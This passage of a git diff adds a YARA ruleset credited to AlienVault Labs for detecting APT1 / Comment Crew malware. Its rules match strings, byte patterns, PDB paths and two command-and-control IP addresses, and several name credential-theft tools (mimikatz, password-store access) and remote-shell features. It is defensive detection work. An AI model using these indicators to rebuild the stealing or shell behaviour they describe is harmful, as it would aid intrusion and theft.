diff --git a/malware/APT1.yar b/malware/APT1.yar
new file mode 100644
index 0000000..dbf3d38
--- /dev/null
+++ b/malware/APT1.yar
@@ -0,0 +1,1172 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LIGHTDART_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "ret.log" wide ascii
+                $s2 = "Microsoft Internet Explorer 6.0" wide ascii
+                $s3 = "szURL Fail" wide ascii
+                $s4 = "szURL Successfully" wide ascii
+                $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii
+        condition:
+                all of them
+}
+
+rule AURIGA_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "superhard corp." wide ascii
+                $s2 = "microsoft corp." wide ascii
+                $s3 = "[Insert]" wide ascii
+                $s4 = "[Delete]" wide ascii
+                $s5 = "[End]" wide ascii
+                $s6 = "!(*@)(!@KEY" wide ascii
+                $s7 = "!(*@)(!@SID=" wide ascii
+        condition:
+                all of them
+}
+
+rule AURIGA_driver_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Services\\riodrv32" wide ascii
+                $s2 = "riodrv32.sys" wide ascii
+                $s3 = "svchost.exe" wide ascii
+                $s4 = "wuauserv.dll" wide ascii
+                $s5 = "arp.exe" wide ascii
+                $pdb = "projects\\auriga" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule BANGAT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "superhard corp." wide ascii
+                $s2 = "microsoft corp." wide ascii
+                $s3 = "[Insert]" wide ascii
+                $s4 = "[Delete]" wide ascii
+                $s5 = "[End]" wide ascii
+                $s6 = "!(*@)(!@KEY" wide ascii
+                $s7 = "!(*@)(!@SID=" wide ascii
+                $s8 = "end      binary output" wide ascii
+                $s9 = "XriteProcessMemory" wide ascii
+                $s10 = "IE:Password-Protected sites" wide ascii
+                $s11 = "pstorec.dll" wide ascii
+
+        condition:
+                all of them
+}
+
+rule BISCUIT_GREENCAT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "zxdosml" wide ascii
+                $s2 = "get user name error!" wide ascii
+                $s3 = "get computer name error!" wide ascii
+                $s4 = "----client system info----" wide ascii
+                $s5 = "stfile" wide ascii
+                $s6 = "cmd success!" wide ascii
+
+        condition:
+                all of them
+}
+
+rule BOUNCER_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii
+                $s2 = "IDR_DATA%d" wide ascii
+
+                $s3 = "asdfqwe123cxz" wide ascii
+                $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii
+
+        condition:
+                ($s1 and $s2) or ($s3 and $s4)
+
+}
+
+rule BOUNCER_DLL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "new_connection_to_bounce():" wide ascii
+                $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii
+
+        condition:
+                all of them
+}
+
+rule CALENDAR_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "content" wide ascii
+                $s2 = "title" wide ascii
+                $s3 = "entry" wide ascii
+                $s4 = "feed" wide ascii
+                $s5 = "DownRun success" wide ascii
+                $s6 = "%s@gmail.com" wide ascii
+                $s7 = "<!--%s-->" wide ascii
+
+                $b8 = "W4qKihsb+So=" wide ascii
+                $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii
+                $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii
+
+        condition:
+                all of ($s*) or all of ($b*)
+}
+
+rule COMBOS_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii
+                $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii
+                $s3 = "Delay" wide ascii
+                $s4 = "Getfile" wide ascii
+                $s5 = "Putfile" wide ascii
+                $s6 = "---[ Virtual Shell]---" wide ascii
+                $s7 = "Not Comming From Our Server %s." wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule DAIRY_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii
+                $s2 = "KilFail" wide ascii
+                $s3 = "KilSucc" wide ascii
+                $s4 = "pkkill" wide ascii
+                $s5 = "pklist" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule GLOOXMAIL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Kill process success!" wide ascii
+                $s2 = "Kill process failed!" wide ascii
+                $s3 = "Sleep success!" wide ascii
+                $s4 = "based on gloox" wide ascii
+
+                $pdb = "glooxtest.pdb" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule GOGGLES_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Kill process success!" wide ascii
+                $s2 = "Kill process failed!" wide ascii
+                $s3 = "Sleep success!" wide ascii
+                $s4 = "based on gloox" wide ascii
+
+                $pdb = "glooxtest.pdb" wide ascii
+
+        condition:
+                all of ($s*) or $pdb
+}
+
+rule HACKSFASE1_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = {cb 39 82 49 42 be 1f 3a}
+
+        condition:
+                all of them
+}
+
+rule HACKSFASE2_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Send to Server failed." wide ascii
+                $s2 = "HandShake with the server failed. Error:" wide ascii
+                $s3 = "Decryption Failed. Context Expired." wide ascii
+
+        condition:
+                all of them
+}
+
+rule KURTON_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii
+                $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii
+                $s3 = "MyTmpFile.Dat" wide ascii
+                $s4 = "SvcHost.DLL.log" wide ascii
+
+        condition:
+                all of them
+}
+
+rule LONGRUN_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii
+                $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii
+                $s3 = "wait:" wide ascii
+                $s4 = "Dcryption Error! Invalid Character" wide ascii
+
+        condition:
+                all of them
+}
+
+rule MACROMAIL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "svcMsn.dll" wide ascii
+                $s2 = "RundllInstall" wide ascii
+                $s3 = "Config service %s ok." wide ascii
+                $s4 = "svchost.exe" wide ascii
+
+        condition:
+                all of them
+}
+
+rule MANITSME_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Install an Service hosted by SVCHOST." wide ascii
+                $s2 = "The Dll file that to be released." wide ascii
+                $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
+                $s4 = "svchost.exe" wide ascii
+
+                $e1 = "Man,it's me" wide ascii
+                $e2 = "Oh,shit" wide ascii
+                $e3 = "Hallelujah" wide ascii
+                $e4 = "nRet == SOCKET_ERROR" wide ascii
+
+                $pdb1 = "rouji\\release\\Install.pdb" wide ascii
+                $pdb2 = "rouji\\SvcMain.pdb" wide ascii
+
+        condition:
+                (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
+}
+
+rule MINIASP_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "miniasp" wide ascii
+                $s2 = "wakeup=" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "command is null!" wide ascii
+                $s5 = "device_input.asp?device_t=" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule NEWSREELS_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii
+                $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "command is null!" wide ascii
+                $s5 = "noclient" wide ascii
+                $s6 = "wait" wide ascii
+                $s7 = "active" wide ascii
+                $s8 = "hello" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule SEASALT_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii
+                $s2 = "upfileok" wide ascii
+                $s3 = "download ok!" wide ascii
+                $s4 = "upfileer" wide ascii
+                $s5 = "fxftest" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule STARSYPOUND_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "*(SY)# cmd" wide ascii
+                $s2 = "send = %d" wide ascii
+                $s3 = "cmd.exe" wide ascii
+                $s4 = "*(SY)#" wide ascii
+
+
+        condition:
+                all of them
+}
+
+rule SWORD_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii
+                $s2 = "sleep:" wide ascii
+                $s3 = "down:" wide ascii
+                $s4 = "*========== Bye Bye ! ==========*" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule thequickbrow_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "thequickbrownfxjmpsvalzydg" wide ascii
+
+
+        condition:
+                all of them
+}
+
+
+rule TABMSGSQL_APT1 {
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+        strings:
+                $s1 = "letusgohtppmmv2.0.0.1" wide ascii
+                $s2 = "Mozilla/4.0 (compatible; )" wide ascii
+                $s3 = "filestoc" wide ascii
+                $s4 = "filectos" wide ascii
+                $s5 = "reshell" wide ascii
+
+        condition:
+                all of them
+}
+
+rule CCREWBACK1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "postvalue" wide ascii
+    $b = "postdata" wide ascii
+    $c = "postfile" wide ascii
+    $d = "hostname" wide ascii
+    $e = "clientkey" wide ascii
+    $f = "start Cmd Failure!" wide ascii
+    $g = "sleep:" wide ascii
+    $h = "downloadcopy:" wide ascii
+    $i = "download:" wide ascii
+    $j = "geturl:" wide ascii
+    $k = "1.234.1.68" wide ascii
+
+  condition:
+    4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k
+}
+
+rule TrojanCookies_CCREW
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "sleep:" wide ascii
+    $b = "content=" wide ascii
+    $c = "reqpath=" wide ascii
+    $d = "savepath=" wide ascii
+    $e = "command=" wide ascii
+
+
+  condition:
+    4 of ($a,$b,$c,$d,$e)
+}
+
+rule GEN_CCREW1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "W!r@o#n$g" wide ascii
+    $b = "KerNel32.dll" wide ascii
+
+  condition:
+    any of them
+}
+
+rule Elise
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "SetElise.pdb" wide ascii
+
+  condition:
+    $a
+}
+
+rule EclipseSunCloudRAT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "Eclipse_A" wide ascii
+    $b = "\\PJTS\\" wide ascii
+    $c = "Eclipse_Client_B.pdb" wide ascii
+    $d = "XiaoME" wide ascii
+    $e = "SunCloud-Code" wide ascii
+    $f = "/uc_server/data/forum.asp" wide ascii
+
+  condition:
+    any of them
+}
+
+rule MoonProject
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "Serverfile is smaller than Clientfile" wide ascii
+    $b = "\\M tools\\" wide ascii
+    $c = "MoonDLL" wide ascii
+        $d = "\\M tools\\" wide ascii
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader2
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "3gZFQOBtY3sifNOl" wide ascii
+        $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii
+        $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewMiniasp
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "MiniAsp.pdb" wide ascii
+    $b = "device_t=" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewSSLBack2
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = {39 82 49 42 BE 1F 3A}
+
+  condition:
+    any of them
+}
+
+rule ccrewSSLBack3
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "SLYHKAAY" wide ascii
+
+  condition:
+    any of them
+}
+
+
+rule ccrewSSLBack1
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "!@#%$^#@!" wide ascii
+    $b = "64.91.80.6" wide ascii
+
+  condition:
+    any of them
+}
+
+rule ccrewDownloader3
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "ejlcmbv" wide ascii
+        $b = "bhxjuisv" wide ascii
+        $c = "yqzgrh" wide ascii
+        $d = "uqusofrp" wide ascii
+        $e = "Ljpltmivvdcbb" wide ascii
+        $f = "frfogjviirr" wide ascii
+        $g = "ximhttoskop" wide ascii
+  condition:
+    4 of them
+}
+
+
+rule ccrewQAZ
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "!QAZ@WSX" wide ascii
+
+  condition:
+    $a
+}
+
+rule metaxcd
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "<meta xcd=" wide ascii
+
+  condition:
+    $a
+}
+
+rule MiniASP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+strings:
+    $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
+    $PDB = "MiniAsp.pdb" nocase wide ascii
+
+condition:
+    any of them
+}
+
+rule DownloaderPossibleCCrew
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+  strings:
+    $a = "%s?%.6u" wide ascii
+    $b = "szFileUrl=%s" wide ascii
+    $c = "status=%u" wide ascii
+    $d = "down file success" wide ascii
+        $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii
+
+  condition:
+    all of them
+}
+
+rule APT1_MAPIGET
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $s1 = "%s\\Attachment.dat" wide ascii
+        $s2 = "MyOutlook" wide ascii
+        $s3 = "mail.txt" wide ascii
+        $s4 = "Recv Time:" wide ascii
+        $s5 = "Subject:" wide ascii
+
+    condition:
+        all of them
+}
+
+rule APT1_LIGHTBOLT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "bits.exe" wide ascii
+        $str2 = "PDFBROW" wide ascii
+        $str3 = "Browser.exe" wide ascii
+        $str4 = "Protect!" wide ascii
+    condition:
+        2 of them
+}
+
+rule APT1_GETMAIL
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $stra1 = "pls give the FULL path" wide ascii
+        $stra2 = "mapi32.dll" wide ascii
+        $stra3 = "doCompress" wide ascii
+
+        $strb1 = "getmail.dll" wide ascii
+        $strb2 = "doCompress" wide ascii
+        $strb3 = "love" wide ascii
+    condition:
+        all of ($stra*) or all of ($strb*)
+}
+
+rule APT1_GDOCUPLOAD
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "name=\"GALX\"" wide ascii
+        $str2 = "User-Agent: Shockwave Flash" wide ascii
+        $str3 = "add cookie failed..." wide ascii
+        $str4 = ",speed=%f" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_Y21K
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "Y29ubmVjdA" wide ascii // connect
+        $2 = "c2xlZXA" wide ascii // sleep
+        $3 = "cXVpdA" wide ascii // quit
+        $4 = "Y21k" wide ascii // cmd
+        $5 = "dW5zdXBwb3J0" wide ascii // unsupport
+    condition:
+        4 of them
+}
+
+rule APT1_WEBC2_YAHOO
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $http1 = "HTTP/1.0" wide ascii
+        $http2 = "Content-Type:" wide ascii
+        $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_UGX
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
+        $exe = "DefWatch.exe" wide ascii
+        $html = "index1.html" wide ascii
+        $cmd1 = "!@#tiuq#@!" wide ascii
+        $cmd2 = "!@#dmc#@!" wide ascii
+        $cmd3 = "!@#troppusnu#@!" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_TOCK
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "InprocServer32" wide ascii
+        $2 = "HKEY_PERFORMANCE_DATA" wide ascii
+        $3 = "<!---[<if IE 5>]id=" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_TABLE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $msg1 = "Fail To Execute The Command" wide ascii
+        $msg2 = "Execute The Command Successfully" wide ascii
+        /*
+	$gif1 = /\w+\.gif/
+	*/
+        $gif2 = "GIF89" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_RAVE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "iniet.exe" wide ascii
+        $2 = "cmd.exe" wide ascii
+        $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii
+        $4 = "Device File System" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_QBP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "2010QBP" wide ascii
+        $2 = "adobe_sl.exe" wide ascii
+        $3 = "URLDownloadToCacheFile" wide ascii
+        $4 = "dnsapi.dll" wide ascii
+        $5 = "urlmon.dll" wide ascii
+    condition:
+        4 of them
+}
+
+rule APT1_WEBC2_HEAD
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "Ready!" wide ascii
+        $2 = "connect ok" wide ascii
+        $3 = "WinHTTP 1.0" wide ascii
+        $4 = "<head>" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_GREENCAT
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "reader_sl.exe" wide ascii
+        $2 = "MS80547.bat" wide ascii
+        $3 = "ADR32" wide ascii
+        $4 = "ControlService failed!" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_DIV
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii
+        $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii
+        $3 = "Hello from MFC!" wide ascii
+        $4 = "Microsoft Internet Explorer" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_WEBC2_CSON
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $httpa1 = "/Default.aspx?INDEX=" wide ascii
+        $httpa2 = "/Default.aspx?ID=" wide ascii
+        $httpb1 = "Win32" wide ascii
+        $httpb2 = "Accept: text*/*" wide ascii
+        $exe1 = "xcmd.exe" wide ascii
+        $exe2 = "Google.exe" wide ascii
+    condition:
+        1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
+}
+
+rule APT1_WEBC2_CLOVER
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $msg1 = "BUILD ERROR!" wide ascii
+        $msg2 = "SUCCESS!" wide ascii
+        $msg3 = "wild scan" wide ascii
+        $msg4 = "Code too clever" wide ascii
+        $msg5 = "insufficient lookahead" wide ascii
+        $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii
+        $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii
+    condition:
+        2 of ($msg*) and 1 of ($ua*)
+}
+
+rule APT1_WEBC2_BOLID
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $vm = "VMProtect" wide ascii
+        $http = "http://[c2_location]/[page].html" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_ADSPACE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "<!---HEADER ADSPACE style=" wide ascii
+        $2 = "ERSVC.DLL" wide ascii
+    condition:
+        all of them
+}
+
+rule APT1_WEBC2_AUSOV
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "ntshrui.dll" wide ascii
+        $2 = "%SystemRoot%\\System32\\" wide ascii
+        $3 = "<!--DOCHTML" wide ascii
+        $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii
+        $5 = "Ausov" wide ascii
+    condition:
+        4 of them
+}
+
+rule APT1_WARP
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $err1 = "exception..." wide ascii
+        $err2 = "failed..." wide ascii
+        $err3 = "opened..." wide ascii
+        $exe1 = "cmd.exe" wide ascii
+        $exe2 = "ISUN32.EXE" wide ascii
+    condition:
+        2 of ($err*) and all of ($exe*)
+}
+
+rule APT1_TARSIP_ECLIPSE
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $1 = "\\pipe\\ssnp" wide ascii
+        $2 = "toobu.ini" wide ascii
+        $3 = "Serverfile is not bigger than Clientfile" wide ascii
+        $4 = "URL download success" wide ascii
+    condition:
+        3 of them
+}
+
+rule APT1_TARSIP_MOON
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii
+        $s2 = "URL download success!" wide ascii
+        $s3 = "Kugoosoft" wide ascii
+        $msg1 = "Modify file failed!! So strange!" wide ascii
+        $msg2 = "Create cmd process failed!" wide ascii
+        $msg3 = "The command has not been implemented!" wide ascii
+        $msg4 = "Runas success!" wide ascii
+        $onec1 = "onec.php" wide ascii
+        $onec2 = "/bin/onec" wide ascii
+    condition:
+        1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
+}
+
+rule APT1_payloads
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $pay1 = "rusinfo.exe" wide ascii
+        $pay2 = "cmd.exe" wide ascii
+        $pay3 = "AdobeUpdater.exe" wide ascii
+        $pay4 = "buildout.exe" wide ascii
+        $pay5 = "DefWatch.exe" wide ascii
+        $pay6 = "d.exe" wide ascii
+        $pay7 = "em.exe" wide ascii
+        $pay8 = "IMSCMig.exe" wide ascii
+        $pay9 = "localfile.exe" wide ascii
+        $pay10 = "md.exe" wide ascii
+        $pay11 = "mdm.exe" wide ascii
+        $pay12 = "mimikatz.exe" wide ascii
+        $pay13 = "msdev.exe" wide ascii
+        $pay14 = "ntoskrnl.exe" wide ascii
+        $pay15 = "p.exe" wide ascii
+        $pay16 = "otepad.exe" wide ascii
+        $pay17 = "reg.exe" wide ascii
+        $pay18 = "regsvr.exe" wide ascii
+        $pay19 = "runinfo.exe" wide ascii
+        $pay20 = "AdobeUpdate.exe" wide ascii
+        $pay21 = "inetinfo.exe" wide ascii
+        $pay22 = "svehost.exe" wide ascii
+        $pay23 = "update.exe" wide ascii
+        $pay24 = "NTLMHash.exe" wide ascii
+        $pay25 = "wpnpinst.exe" wide ascii
+        $pay26 = "WSDbg.exe" wide ascii
+        $pay27 = "xcmd.exe" wide ascii
+        $pay28 = "adobeup.exe" wide ascii
+        $pay29 = "0830.bin" wide ascii
+        $pay30 = "1001.bin" wide ascii
+        $pay31 = "a.bin" wide ascii
+        $pay32 = "ISUN32.EXE" wide ascii
+        $pay33 = "AcroRD32.EXE" wide ascii
+        $pay34 = "INETINFO.EXE" wide ascii
+    condition:
+        1 of them
+}
+
+
+rule APT1_RARSilent_EXE_PDF
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $winrar1 = "WINRAR.SFX" wide ascii
+        /*
+        $winrar2 = ";The comment below contains SFX script commands" wide ascii
+        $winrar3 = "Silent=1" wide ascii
+	*/
+
+        /*$str1 = /Setup=[\s\w\"]+\.(exe|pdf|doc)/
+	*/
+        $str2 = "Steup=\"" wide ascii
+    condition:
+        all of ($winrar*) and 1 of ($str*)
+}
+
+rule APT1_aspnetreport
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $url = "aspnet_client/report.asp" wide ascii
+        $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii
+    condition:
+        $url and $param and APT1_payloads
+}
+
+rule APT1_Revird_svc
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $dll1 = "nwwwks.dll" wide ascii
+        $dll2 = "rdisk.dll" wide ascii
+        $dll3 = "skeys.dll" wide ascii
+        $dll4 = "SvcHost.DLL.log" wide ascii
+        $svc1 = "InstallService" wide ascii
+        $svc2 = "RundllInstallA" wide ascii
+        $svc3 = "RundllUninstallA" wide ascii
+        $svc4 = "ServiceMain" wide ascii
+        $svc5 = "UninstallService" wide ascii
+    condition:
+        1 of ($dll*) and 2 of ($svc*)
+}
+
+rule APT1_dbg_mess
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $dbg1 = "Down file ok!" wide ascii
+        $dbg2 = "Send file ok!" wide ascii
+        $dbg3 = "Command Error!" wide ascii
+        $dbg4 = "Pls choose target first!" wide ascii
+        $dbg5 = "Alert!" wide ascii
+        $dbg6 = "Pls press enter to make sure!" wide ascii
+        $dbg7 = "Are you sure to " wide ascii
+    condition:
+        4 of them and APT1_payloads
+}
+
+rule APT1_known_malicious_RARSilent
+{
+    meta:
+        author = "AlienVault Labs"
+        info = "CommentCrew-threat-apt1"
+
+    strings:
+        $str1 = "Analysis And Outlook.doc\"" wide ascii
+        $str2 = "North Korean launch.pdf\"" wide ascii
